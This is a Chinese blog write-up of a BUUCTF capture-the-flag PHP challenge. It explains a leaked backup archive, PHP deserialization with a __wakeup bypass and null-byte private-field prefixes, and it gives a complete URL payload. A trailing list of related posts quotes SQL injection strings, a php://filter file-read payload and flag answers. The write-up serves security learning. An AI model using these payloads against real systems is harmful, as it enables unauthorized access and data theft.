buuctf-web-[极客大挑战 2019]PHP-wp

最新推荐文章于 2023-01-05 15:15:13 发布
最新推荐文章于 2023-01-05 15:15:13 发布
阅读量189 收藏 1
点赞数
分类专栏: ctf记录
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><
本文链接:https://blog.youkuaiyun.com/weixin_46439278/article/details/118737304
版权
本文探讨了PHP中一个关于备份文件泄露的挑战,涉及反序列化漏洞利用技巧。通过理解如何避开`__wakeup`函数并巧妙地序列化对象,作者展示了如何在私有字段保护下获取flag。关键步骤包括构造特殊序列化字符串和处理私有字段的前缀。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[极客大挑战 2019]PHP

知识点

  • 备份文件泄露
  • 反序列漏洞

过程

主页:(提示我们存在备份文件),扫一下常见备份目录

发现www.zip,打开源码,在index.php发现有个存在反序列化漏洞

然后在class.php中可以看到,如果满足两个条件:

  • password的值等于100
  • username的值等于admin

即可输出flag,但是如何让username的值为admin呢?由于wakeup方法会导致username成为guest,因此需要通过序列化字符串中对象的个数来绕过该方法。

跳过__wakeup()

在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过 __wakeup()函数的执行

因此我们将序列化这样设置

O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

不过还是没有结束,因为这个声明变量是private

private

private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度

我们再次改造一下序列化

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

payload:

?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}
BUUCTF-Web题解(持续更新中)
2301_80281749的博客
11-25 2316
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
BUUCTF系列 // [极客挑战 2019] Http
qq_45805420的博客
09-25 1671
前言 本题知识点:常用 HTTP 请求头 WP 打开题目,在页面中没有发现明显的提示,查看网页源码,经搜索后发现一个似乎存在猫腻的网页 ‘Secret.php’ 访问该页面,得到第一个提示 题目要求我们从 ‘https://www.Sycsecret.com’ 进入该页面,故使用 burpsuite 抓包,在请求头中增加 Referer 字段即可 Referer HTTP Referer是 header 的一部分,当浏览器向 Web 服务器发送请求的时候,一般会带上 Referer,告诉服务器该网页是从
BUUCTF WEB [极客挑战 2019]PHP
Y1da的博客
04-16 1090
BUUCTF WEB [极客挑战 2019]PHP 题目提示网站存在备份,使用御剑扫描目录,发现备份文件 http://9ce7b58e-0829-4ed4-b7ca-7a1b7fd02741.node4.buuoj.cn:81/www.zip 下载后解压,得到index.php、class.php、flag.php等文件。 index.php(部分代码) <?php include 'class.php'; $select = $_GET['select']; $res=unser
buuctf-web-[极客挑战 2019]PHP
weixin_46079186的博客
07-02 502
题目地址 1.打开题目 提到网站备份我们直接扫描一下网站备份文件,御剑啥的都行,线程一定不要开太,开5就行开太可能扫描不出来。扫描到一个www.zip 下载文件打开 打开index.php,应该是反序列化 打开class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; // 私有变量只有本类可以使用 privat
BUUCTF-Web】 [极客挑战 2019]PHP
RexHa的博客
09-04 837
BUUCTF-Web】 [极客挑战 2019]PHP
buuctf-web-[极客挑战 2019]PHP1
mlws1900的博客
09-22 590
因为成员(属性)是private,所以要在类名和成员名前加%00这个url编码是空的意思。在反序列化时,当前属性个数于实际属性个数时,就会跳过__wakeup(),去执行__destruct。观察代码,发现需要username=admin,password=100才能获取flag。但是反序列化时会先运行__wakeup函数,对username赋值guest,需要绕过。打开环境,发现提示有备份文件,用dirsearch扫一遍,获得备份文件。index.php文件内容发现传参地址,对select进行传参。
[极客挑战 2019]PHP wp
{OvEr}的博客
11-20 381
[极客挑战 2019]PHP wp知识点解题 考点是php反序列化以及wakeup()方法绕过 知识点 1.serialize:序列化,把一个对象转换成字符串形式,可以用于保存 unserialize:反序列化,把serialize后的字符串转换成一个对象 2.__wakeup()方法绕过 (CVE-2016-7124) 作用:与__sleep()函数相反,__sleep()函数,是在序序列化时被自动调用。__wakeup()函数,在反序列化时,被自动调用。绕过:当反序列化字符串,表示属性个数的值于真实
WEB】[极客挑战2019]EasySQL WP
Miscedence__的博客
04-15 490
0X0000000000000001 审题 其实由题目可以知道这是道SQL注入,然后看到登录,首先尝试万能密码: admin’ or ‘1’='1 如名字所说,这是一道很ez的SQL注入 通过这道题,我们来延伸一下其他东西 0X0000000000000002 关于万能密码 为什么在注入的时候输入万能密码就可以进入呢,对于所有万能密码,都是”万能“的吗? 那么首先,让我们清楚 SQL注入-万能密码的注入原理 0_用户进行用户名和密码验证时,网站需要查询数据库,查询数据库就是执行SQL语句 //
BUUCTF-WEB
ccfly1012的博客
11-02 4084
目录 [HCTF 2018]WarmUp [极客挑战 2019]EasySQL 总结万能密码 [极客挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
buuctf [极客挑战 2019]Secret File wp
最新发布
03-14
### BUUCTF 极客挑战 2019 Secret File Writeup 解题思路 此题目属于文件包含漏洞(File Inclusion Vulnerability)类型的Web安全挑战。以下是详细的分析过程: #### 题目背景 通过F12查看网页源码,发现了隐藏...
BUUCTF [极客挑战 2019]PHP WP
Force~
11-13 463
前言 以前一直对PHP反序列化似懂非懂,现在借此机会将其弄懂,参考了各位师傅的wp而一步一步的学习。 CTF平台:https://buuoj.cn/challenges(传送门) 过程 打开之后是这样的画面 根据题目提示备份网站,所以很容易想到备份的源码泄露----->用dirsearch扫目录 dirsearch 一款基于python3的目录爆破工具 下载地址: (没有这个工具的可以进入giuhub下载,此处附上链接) https://github.com/maurosoria/dirse
BUUCTF-web [极客挑战 2019]PHP1 之 反序列化漏洞
yu_jing_hong的博客
12-02 2982
PHP反序列化漏洞 一,什么是序列与反序列 序列就是把数据转成可逆的数据结构,目的是方便数据的储存和传输,反序列就是将数据逆转成原来的状态,序列就是拆数据,使得传输或储存更容易的过程,反序列就是重新拼凑还原数据的过程。 二,PHP中的反序列方法 PHP通过string serialize ( mixed $value )和mixed unserialize ( string $str )两个函数实现序列化和反序列化。 序列化:serialize()将一个对象转换成一个字符串。反序列化:un.
BUUCTF [极客挑战 2019]BuyFlag
weixin_41571993的博客
04-20 2267
靶场练习
web buuctf [极客挑战 2019]PHP1
weixin_44214568的博客
09-13 320
1.根据题目,存在源代码备份文件,flag应该在备份文件里,需要扫描后台的目录 我没有别的啥工具,用的dirsearch,这个可以从github上直接下,然后解压之后就可以直接用 cmd 打开 py dirsearch.py -u 路径 -e * -s 4(简单解释一下,u后填上需要爆破的后台路径,e是必填项,填上*因为确实不知道格式,重点说一下-s 这后面跟的是一个浮点,表示的是请求的延迟,因为爆破需要量的请求,会爆出一堆429,这个http错误代码表示的就是因为请求太多,后台拒绝了请求,导致无法.
BUUCTF-Web】[极客挑战 2019]BabySQL
weixin_49298681的博客
01-05 346
1.根据提示知道sql注入有严格的过滤;再通过尝试找到绕过的方法为藏字符2.直接获得username和password 但是没有有用的信息3.通过order by的报错知晓有多少列:root =4.寻找回显点:root =>5.获得数据库基本信息:root =>6.通过information_schema数据库爆破table_name + column_names1.root =2.root =7.再根据知道的column_names去获取数据1.root =
Web方向】 3-1 PHP反序列化buuCTF实例UnserializeOne wp
wanderer的博客
11-16 742
BUUCTF PHP反序列化UnserializeOne wp,过程有点绕脑……
BUUCTF__[极客挑战 2019]PHP_题解
风过江南乱的博客
06-11 2361
前言 最近期末考试了,没时间做题,太难了。 期末考试真的烦,得冷静冷静。
BUUCTF】[极客挑战 2019] PHP 清晰易懂详细总结 Writeup
algae
08-26 2156
BUUCTF】[极客挑战 2019] PHP Writeup0x00 考点目录扫描源码泄露反序列化0x01 解题 0x00 考点 目录扫描 源码泄露 反序列化 0x01 解题 dirsearch -u 指定url -e 指定网站语言 -w 可以加上自己的字典(加上路径) -r 递归跑(查到一个目录后,在目录后重复跑,很慢,不建议用) python3 dirsearch.py -u http://26e0c1d7-d98e-4a34-9ffe-901887297fb5.node3.buuoj.cn
BUUCTF web 极客挑战 2019
菜的只能随便写写博客
04-01 1907
0x01 Secret File  在源码之中得到一个php页面  后面页面之中  根据提示抓包,在其中返回的页面得到了信息  得到源码,根据源码,发现存在文件包含漏洞  利用php伪协议,获取flag.php的信息,拿取flag payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php EasyS...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值